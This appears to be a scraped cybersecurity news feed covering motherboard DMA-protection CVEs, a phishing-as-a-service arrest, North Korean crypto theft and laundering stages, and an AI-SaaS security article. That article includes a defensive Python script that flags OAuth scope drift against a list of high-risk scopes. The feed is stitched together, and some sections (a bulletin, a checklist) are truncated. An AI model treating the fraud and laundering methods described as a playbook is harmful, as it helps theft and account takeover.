    • CVE-2025-14302 (CVSS score: 7.0) – A protection mechanism failure vulnerability affecting GIGABYTE motherboards using Intel Z890, W880, Q870, B860, H810, Z790, B760, Z690, Q670, B660, H610, W790 series chipsets, and AMD X870E, X870, B850, B840, X670, B650, A620, A620A, and TRX50 series chipsets (Fix for TRX50 planned for Q1 2026)
    • CVE-2025-14303 (CVSS score: 7.0) – A protection mechanism failure vulnerability affecting MSI motherboards using Intel 600 and 700 series chipsets

    With impacted vendors releasing firmware updates to correct the IOMMU initialization sequence and enforce DMA protections throughout the boot process, it’s essential that end users and administrators apply them as soon as they are available to stay protected against the threat.

    “In environments where physical access cannot be fully controlled or relied on, prompt patching and adherence to hardware security best practices are especially important,” CERT/CC said. “Because the IOMMU also plays a foundational role in isolation and trust delegation in virtualized and cloud environments, this flaw highlights the importance of ensuring correct firmware configuration even on systems not typically used in data centers.”


    Source: thehackernews.com…

  • Nigeria Arrests RaccoonO365 Phishing Developer Linked to Microsoft 365 Attacks


    Dec 19, 2025 | Ravie Lakshmanan | Cybercrime / Law Enforcement

    Authorities in Nigeria have announced the arrest of three “high-profile internet fraud suspects” who are alleged to have been involved in phishing attacks targeting major corporations, including the main developer behind the RaccoonO365 phishing-as-a-service (PhaaS) scheme.

    The Nigeria Police Force National Cybercrime Centre (NPF–NCCC) said investigations conducted in collaboration with Microsoft and the Federal Bureau of Investigation (FBI) led to the identification of Okitipi Samuel, also known as Moses Felix, as the principal suspect and developer of the phishing infrastructure.

    “Investigations reveal that he operated a Telegram channel through which phishing links were sold in exchange for cryptocurrency and hosted fraudulent login portals on Cloudflare using stolen or fraudulently obtained email credentials,” the NPF said in a post shared on social media.

    In addition, laptops, mobile devices, and other digital equipment linked to the operation have been seized following search operations conducted at their residences. The two other arrested individuals have no connection to the creation or operation of the PhaaS service, per the NPF.


    RaccoonO365 is the name assigned to a financially motivated threat group behind a PhaaS toolkit that enables bad actors to conduct credential harvesting attacks by serving phishing pages mimicking Microsoft 365 login pages. Microsoft is tracking the threat actor under the moniker Storm-2246.

    Back in September 2025, the tech giant said it worked with Cloudflare to seize 338 domains used by RaccoonO365. The phishing infrastructure attributed to the toolkit is estimated to have led to the theft of at least 5,000 Microsoft credentials from 94 countries since July 2024.

    The NPF said RaccoonO365 was used to set up fraudulent Microsoft login portals aimed at stealing user credentials and using them to gain unlawful access to the email platforms of corporate, financial, and educational institutions. The joint probe has uncovered multiple incidents of unauthorized Microsoft 365 account access between January and September 2025 that originated from phishing messages crafted to mimic legitimate Microsoft authentication pages.

    These activities led to business email compromise, data breaches, and financial losses across multiple jurisdictions, the NPF added.

    A civil lawsuit filed by Microsoft and Health-ISAC in September has accused defendants Joshua Ogundipe and four other John Does of hosting a cybercriminal operation by “selling, distributing, purchasing, and implementing” the phishing kit to facilitate sophisticated spear-phishing and siphon sensitive information.

    The stolen data is then used to fuel more cybercrimes, including business email compromise, financial fraud, and ransomware attacks, as well as to commit intellectual property violations.


    The development comes as Google filed a lawsuit against the operators of the Darcula PhaaS service, naming Chinese national Yucheng Chang as the group’s leader along with 24 other members. The company is seeking a court order to seize the group’s server infrastructure that has been behind a massive smishing wave impersonating U.S. government entities.

    News of the lawsuit was first reported by NBC News on December 17, 2025. The development comes a little over a month after Google also sued China-based hackers associated with another PhaaS service known as Lighthouse that’s believed to have impacted over 1 million users across 120 countries.


    Source: thehackernews.com…

  • The Case for Dynamic AI-SaaS Security as Copilots Scale


    Within the past year, artificial intelligence copilots and agents have quietly permeated the SaaS applications businesses use every day. Tools like Zoom, Slack, Microsoft 365, Salesforce, and ServiceNow now come with built-in AI assistants or agent-like features. Virtually every major SaaS vendor has rushed to embed AI into their offerings.

    The result is an explosion of AI capabilities across the SaaS stack, a phenomenon of AI sprawl where AI tools proliferate without centralized oversight. For security teams, this represents a shift. As these AI copilots scale up in use, they are changing how data moves through SaaS. An AI agent can connect multiple apps and automate tasks across them, effectively creating new integration pathways on the fly.

    An AI meeting assistant might automatically pull in documents from SharePoint to summarize in an email, or a sales AI might cross-reference CRM data with financial records in real time. These AI data connections form complex, dynamic pathways that traditional static app models never had.

    When AI Blends In – Why Traditional Governance Breaks

    This shift has exposed a fundamental weakness in legacy SaaS security and governance. Traditional controls assumed stable user roles, fixed app interfaces, and human-paced changes. However, AI agents break those assumptions. They operate at machine speed, traverse multiple systems, and often wield higher-than-usual privileges to perform their job. Their activity tends to blend into normal user logs and generic API traffic, making it hard to distinguish an AI’s actions from a person’s.

    Consider Microsoft 365 Copilot. It retrieves content under the requesting user’s own permissions, so the exposure is not data the user could never see but everything the user technically can see, including over-shared SharePoint sites nobody has reviewed in years, assembled into a single answer. And unless you are specifically searching the audit log for Copilot interaction events, what a security admin sees in ordinary audit data is an approved account reading files, with no indication that an assistant pulled confidential material together on someone’s behalf. The same opacity serves an attacker: whoever hijacks an AI agent’s token or account can quietly misuse it under that cover.

    Moreover, AI identities don’t behave like human users at all. They don’t fit neatly into existing IAM roles, and they often require very broad data access to function (far more than a single user would need). Traditional data loss prevention tools struggle because once an AI has wide read access, it can potentially aggregate and expose data in ways no simple rule would catch.

    Permission drift is another challenge. In a static world, you might review integration access once a quarter. But AI integrations can change capabilities or accumulate access quickly, outpacing periodic reviews. Access often drifts silently when roles change or new features turn on. A scope that seemed safe last week might quietly expand (e.g., an AI plugin gaining new permissions after an update) without anyone realizing.

    All these factors mean static SaaS security and governance tools are falling behind. If you’re only looking at static app configurations, predefined roles, and after-the-fact logs, you can’t reliably tell what an AI agent actually did, what data it accessed, which records it changed, or whether its permissions have outgrown policy in the interim.

    A Checklist for Securing AI Copilots and Agents

    Before introducing new tools or frameworks, security teams should pressure-test their current posture.

    If several of these questions are difficult for you to answer, it’s a signal that static SaaS security models are no longer sufficient for AI tools.

    Dynamic AI-SaaS Security – Guardrails for AI Apps

    To address these gaps, security teams are beginning to adopt what can be described as dynamic AI-SaaS security.

    In contrast to static security (which treats apps as siloed and unchanging), dynamic AI-SaaS security is a policy-driven, adaptive guardrail layer that operates in real time on top of your SaaS integrations and OAuth grants. Think of it as a living security layer that understands what your copilots and agents are doing moment to moment and adjusts or intervenes according to policy.

    Dynamic AI-SaaS security monitors AI agent activity across all your SaaS apps, watching for policy violations, abnormal behavior, or signs of trouble. Rather than relying on yesterday’s checklist of permissions, it learns and adapts to how an agent is actually being used.

    A dynamic security platform will track an AI agent’s effective access. If the agent suddenly touches a system or dataset outside its usual scope, it can flag or block that in real-time. It can also detect configuration drift or privilege creep instantly and alert teams before an incident occurs.
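    The permission-drift check described earlier and the effective-access check described just above, as one added example that is not Reco’s code or any vendor’s API: a Python script that diffs two constructed snapshots of an agent’s OAuth grant to report added scopes (against a hypothetical high-risk list), learns which SharePoint sites the agent’s service principal touched during a baseline window from constructed audit events, and then flags later events that land outside that baseline. The field names (`app`, `scopes`, `actor`, `resource`), the scope names, and every sample record are assumptions made for the illustration.

```python
"""Added example (not Reco's code or any vendor API): detect OAuth scope drift
for an AI agent and flag access outside the agent's learned baseline.
All grant snapshots and audit events are constructed sample data; field
names such as "scopes", "actor" and "resource" are assumptions."""
from collections import defaultdict

# Scopes that should never appear on an agent without an explicit review (assumed list).
HIGH_RISK_SCOPES = {
    "Files.ReadWrite.All", "Sites.Read.All", "Mail.ReadWrite", "Directory.ReadWrite.All",
}

# Constructed: two inventory snapshots of the same app's OAuth grant, a week apart.
GRANT_SNAPSHOTS = [
    {"app": "meeting-assistant", "taken": "2025-12-01",
     "scopes": {"Calendars.Read", "Mail.Send", "Files.Read"}},
    {"app": "meeting-assistant", "taken": "2025-12-08",
     "scopes": {"Calendars.Read", "Mail.Send", "Files.Read",
                "Files.ReadWrite.All", "Sites.Read.All"}},
]

# Constructed: audit events in which the agent acts as a service principal,
# indistinguishable from any other API client unless you key on the actor.
AUDIT_EVENTS = [
    {"ts": "2025-12-02T09:00:00", "actor": "sp:meeting-assistant", "op": "FileRead",
     "resource": "sites/Engineering/Shared Documents/standup-notes.docx"},
    {"ts": "2025-12-03T09:05:00", "actor": "sp:meeting-assistant", "op": "FileRead",
     "resource": "sites/Engineering/Shared Documents/roadmap.pptx"},
    {"ts": "2025-12-04T14:20:00", "actor": "user:alice", "op": "FileRead",
     "resource": "sites/Finance/Shared Documents/budget-q1.xlsx"},
    {"ts": "2025-12-09T10:00:00", "actor": "sp:meeting-assistant", "op": "FileRead",
     "resource": "sites/Engineering/Shared Documents/retro.docx"},
    {"ts": "2025-12-09T10:02:00", "actor": "sp:meeting-assistant", "op": "FileRead",
     "resource": "sites/Finance/Shared Documents/payroll-2025.xlsx"},
    {"ts": "2025-12-09T10:03:00", "actor": "sp:meeting-assistant", "op": "FileWrite",
     "resource": "sites/HR/Shared Documents/offer-letters/j.doe.docx"},
]


def scope_drift(snapshots):
    """Diff consecutive grant snapshots per app; report added/removed scopes."""
    by_app = defaultdict(list)
    for snap in snapshots:
        by_app[snap["app"]].append(snap)
    findings = []
    for app, snaps in by_app.items():
        snaps.sort(key=lambda s: s["taken"])
        for prev, cur in zip(snaps, snaps[1:]):
            added = cur["scopes"] - prev["scopes"]
            removed = prev["scopes"] - cur["scopes"]
            if added or removed:
                findings.append({
                    "app": app, "from": prev["taken"], "to": cur["taken"],
                    "added": sorted(added), "removed": sorted(removed),
                    "high_risk_added": sorted(added & HIGH_RISK_SCOPES),
                })
    return findings


def container(resource):
    """Coarse-grain a path to its site/library so a new file in a known site is not an alert."""
    return "/".join(resource.split("/")[:2])


def learn_baseline(events, actor, until):
    """Containers the actor touched before `until` (ISO timestamp): its usual scope."""
    return {container(e["resource"]) for e in events
            if e["actor"] == actor and e["ts"] < until}


def out_of_baseline(events, actor, baseline, since):
    """Events from `since` on where the actor touches a container absent from its baseline."""
    return [e for e in events
            if e["actor"] == actor and e["ts"] >= since
            and container(e["resource"]) not in baseline]


def review_agent(snapshots, events, actor, app, cutoff):
    """Combine both signals: did the grant widen, and did behaviour then widen too?"""
    drift = [d for d in scope_drift(snapshots) if d["app"] == app]
    baseline = learn_baseline(events, actor, cutoff)
    anomalies = out_of_baseline(events, actor, baseline, cutoff)
    widened = any(d["high_risk_added"] for d in drift)
    return {
        "baseline": sorted(baseline),
        "scope_drift": drift,
        "out_of_baseline": [(e["ts"], e["op"], e["resource"]) for e in anomalies],
        # A high-risk grant expansion followed by new-territory access: high severity.
        "severity": "high" if widened and anomalies
                    else "medium" if anomalies or drift else "none",
    }


if __name__ == "__main__":
    import json
    print(json.dumps(review_agent(GRANT_SNAPSHOTS, AUDIT_EVENTS, "sp:meeting-assistant",
                                  "meeting-assistant", "2025-12-09T00:00:00"), indent=2))
```

    Run it directly to print the review as JSON. Comparing at the site/library level rather than per file is deliberate: a summarization agent reading a new document in a site it already works in is expected, while its first read from Finance and first write into HR, right after its grant widened to Sites.Read.All and Files.ReadWrite.All, is the combination worth a ticket.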

    Another hallmark of dynamic AI-SaaS security is visibility and auditability. Because the security layer mediates the AI’s actions, it keeps a detailed record of what the AI is doing across systems.

    Every prompt, every file accessed, and every update made by the AI can be logged in structured form. This means that if something does go wrong, say an AI makes an unintended change or accesses a forbidden file, the security team can trace exactly what happened and why.

    Dynamic AI-SaaS security platforms leverage automation and AI themselves to keep up with the torrent of events. They learn normal patterns of agent behavior and can prioritize true anomalies or risks so that security teams aren’t drowning in alerts.

    They might correlate an AI’s actions across multiple apps to understand the context and flag only genuine threats. This proactive stance helps catch issues that traditional tools would miss, whether it’s a subtle data leak via an AI or a malicious prompt injection causing an agent to misbehave.

    Conclusion – Embracing Adaptive Guardrails

    As AI copilots take on a bigger role in our SaaS workflows, security teams should think about evolving their strategy in parallel. The old model of set-and-forget SaaS security, with static roles and infrequent audits, simply can’t keep up with the speed and complexity of AI activity.

    The case for dynamic AI-SaaS security is ultimately about maintaining control without stifling innovation. With the right dynamic security platform in place, organizations can confidently adopt AI copilots and integrations, knowing they have real-time guardrails to prevent misuse, catch anomalies, and enforce policy.

    Dynamic AI-SaaS security platforms (like Reco) are emerging to deliver these capabilities out-of-the-box, from monitoring of AI privileges to automated incident response. They act as that missing layer on top of OAuth and app integrations, adapting on the fly to what agents are doing and ensuring nothing falls through the cracks.

    Figure 1: Reco’s generative AI application discovery

    For security leaders watching the rise of AI copilots, SaaS security can no longer be static. By embracing a dynamic model, you equip your organization with living guardrails that let you ride the AI wave safely. It’s an investment in resilience that will pay off as AI continues to transform the SaaS ecosystem.

    Interested in how dynamic AI-SaaS security could work for your organization? Consider exploring platforms like Reco that are built to provide this adaptive guardrail layer.




    Source: thehackernews.com…

  • ThreatsDay Bulletin: WhatsApp Hijacks, MCP Leaks, AI Recon, React2Shell Exploit and 15 More Stories


    Dec 18, 2025 | Ravie Lakshmanan | Cybersecurity / Hacking News

    This week’s ThreatsDay Bulletin tracks how attackers keep reshaping old tools and finding new angles in familiar systems. Small changes in tactics are stacking up fast, and each one hints at where the next big breach could come from.

    From shifting infrastructures to clever social hooks, the week’s activity shows just how fluid the threat landscape has become.

    Here’s the full rundown of what moved in the cyber world this week.

    1. International scam ring busted

      Authorities from the Czech Republic, Latvia, Lithuania, and Ukraine, along with Eurojust, took action against a criminal network operating call centers in Dnipro, Ivano-Frankivsk, and Kyiv that scammed more than 400 victims across Europe out of more than €10 million ($11.7 million). “The criminal group established a professional organisation with employees who received a percentage of the proceeds for each completed scam,” Eurojust said. “The fraudsters used various scams, such as posing as police officers to withdraw money using their victims’ cards and details, or pretending that their victims’ bank accounts had been hacked. They convinced their victims to transfer large sums of money from their ‘compromised’ bank accounts to ‘safe’ bank accounts controlled by the network. They also lured victims into downloading remote access software and entering their banking details, enabling the criminal group to access and control the victims’ bank accounts.” The call centers employed approximately 100 people, who were recruited from the Czech Republic, Latvia, Lithuania, and other countries. They played different roles, ranging from making calls and forging official certificates from the police and banks to collecting cash from their victims. Employees who successfully obtained money from their victims received up to 7% of the proceeds to encourage them to continue the scam. The criminal enterprise also promised cash bonuses, cars, or apartments in Kyiv to employees who obtained more than €100,000. The operation led to the arrest of 12 suspects on December 9, 2025. Authorities also seized cash, 21 vehicles, and various weapons and ammunition.

    The patterns behind these stories keep repeating — faster code, smarter lures, and fewer pauses between discovery and abuse. Each case adds another piece to the wider map of how attacks adapt when attention fades.

    Next week will bring a fresh set of shifts, but for now, these are the signals worth noting. Stay sharp, connect the dots, and watch what changes next.

    That’s all for this edition of the ThreatsDay Bulletin — the pulse of what’s moving beneath the surface every Thursday.


    Source: thehackernews.com…

  • North Korea-Linked Hackers Steal $2.02 Billion in 2025, Leading Global Crypto Theft



    Threat actors with ties to the Democratic People’s Republic of Korea (DPRK or North Korea) have been instrumental in driving a surge in global cryptocurrency theft in 2025, accounting for at least $2.02 billion out of more than $3.4 billion stolen from January through early December.

    The figure represents a 51% increase year-over-year and $681 million more than in 2024, when the same actors stole roughly $1.34 billion, according to Chainalysis’ Crypto Crime Report shared with The Hacker News.

    “This marks the most severe year on record for DPRK crypto theft in terms of value stolen, with DPRK attacks also accounting for a record 76% of all service compromises,” the blockchain intelligence company said. “Overall, 2025’s numbers bring the lower-bound cumulative estimate for cryptocurrency funds stolen by the DPRK to $6.75 billion.”

    The February compromise of cryptocurrency exchange Bybit alone is responsible for $1.5 billion of the $2.02 billion plundered by North Korea. The attack was attributed to a threat cluster known as TraderTraitor (aka Jade Sleet and Slow Pisces). An analysis published by Hudson Rock earlier this month linked a machine infected with Lumma Stealer to infrastructure associated with the Bybit hack based on the presence of the email address “trevorgreer9312@gmail[.]com.”

    The cryptocurrency thefts are part of a broader series of attacks conducted by the North Korea-backed hacking group called Lazarus Group over the past decade. The adversary is also believed to be involved in the theft of $36 million worth of cryptocurrency from South Korea’s largest cryptocurrency exchange, Upbit, last month.

    Lazarus Group is affiliated with Pyongyang’s Reconnaissance General Bureau (RGB). It’s estimated to have siphoned no less than $200 million from over 25 cryptocurrency heists between 2020 and 2023.


    The nation-state adversary is one of the most prolific hacking groups that also has a track record of orchestrating a long-running campaign referred to as Operation Dream Job, in which prospective employees working in defense, manufacturing, chemical, aerospace, and technology sectors are approached via LinkedIn or WhatsApp with lucrative job opportunities to trick them into downloading and running malware such as BURNBOOK, MISTPEN, and BADCALL, the last of which also comes in a Linux version.

    The end goal of these efforts is two-pronged: to collect sensitive data and generate illicit revenue for the regime in violation of international sanctions imposed on the country.

    A second approach adopted by North Korean threat actors is to embed information technology (IT) workers inside companies across the world under false pretenses, either in an individual capacity or through front companies like DredSoftLabs and Metamint Studio that are set up for this purpose. This also includes gaining privileged access to crypto services and enabling high‑impact compromises. The fraudulent operation has been nicknamed Wagemole.

    “Part of this record year likely reflects an expanded reliance on IT worker infiltration at exchanges, custodians, and Web3 firms, which can accelerate initial access and lateral movement ahead of large‑scale theft,” Chainalysis said.


    Regardless of the method used, the stolen funds are routed through Chinese-language money movement and guarantee services, as well as cross-chain bridges, mixers, and specialized marketplaces like Huione to launder the proceeds. What’s more, the pilfered assets follow a structured, multi-wave laundering pathway that unfolds over approximately 45 days following the hacks –

    • Wave 1: Immediate Layering (Days 0-5), which involves immediate distancing of funds from the theft source using DeFi protocols and mixing services
    • Wave 2: Initial Integration (Days 6-10), which involves shifting the funds to cryptocurrency exchanges, second-tier mixing services, and cross-chain bridges like XMRt
    • Wave 3: Final Integration (Days 20-45), which involves using services that facilitate ultimate conversion to fiat currency or other assets

    “Their heavy use of professional Chinese-language money laundering services and over-the-counter (OTC) traders suggests that DPRK threat actors are tightly integrated with illicit actors across the Asia-Pacific region, and is consistent with Pyongyang’s historical use of China-based networks to gain access to the international financial system,” the company said.

    The disclosure comes as Minh Phuong Ngoc Vong, a 40-year-old Maryland man, has been sentenced to 15 months in prison for his role in the IT worker scheme by allowing North Korean nationals based in Shenyang, China, to use his identity to land jobs at several U.S. government agencies, per the U.S. Department of Justice (DoJ).

    Between 2021 and 2024, Vong used fraudulent misrepresentations to obtain employment with at least 13 different U.S. companies, including landing a contract at the Federal Aviation Administration (FAA). In all, Vong was paid more than $970,000 in salary for software development services that were carried out by overseas conspirators.

    “Vong conspired with others, including John Doe, aka William James, a foreign national living in Shenyang, China, to defraud U.S. companies into hiring Vong as a remote software developer,” the DoJ said. “After securing these jobs through materially false statements about his education, training, and experience, Vong allowed Doe and others to use his computer access credentials to perform the remote software development work and receive payment for that work.”

    The IT worker scheme appears to be undergoing a shift in strategy, with DPRK-linked actors increasingly acting as recruiters to enlist collaborators through platforms like Upwork and Freelancer to further scale the operations.

    “These recruiters approach targets with a scripted pitch, requesting ‘collaborators’ to help bid on and deliver projects. They provide step-by-step instructions for account registration, identity verification, and credential sharing,” Security Alliance said in a report published last month.

    “In many cases, victims ultimately surrender full access to their freelance accounts or install remote-access tools such as AnyDesk or Chrome Remote Desktop. This enables the threat actor to operate under the victim’s verified identity and IP address, allowing them to bypass platform verification controls and conduct illicit activity undetected.”


    Source: thehackernews.com…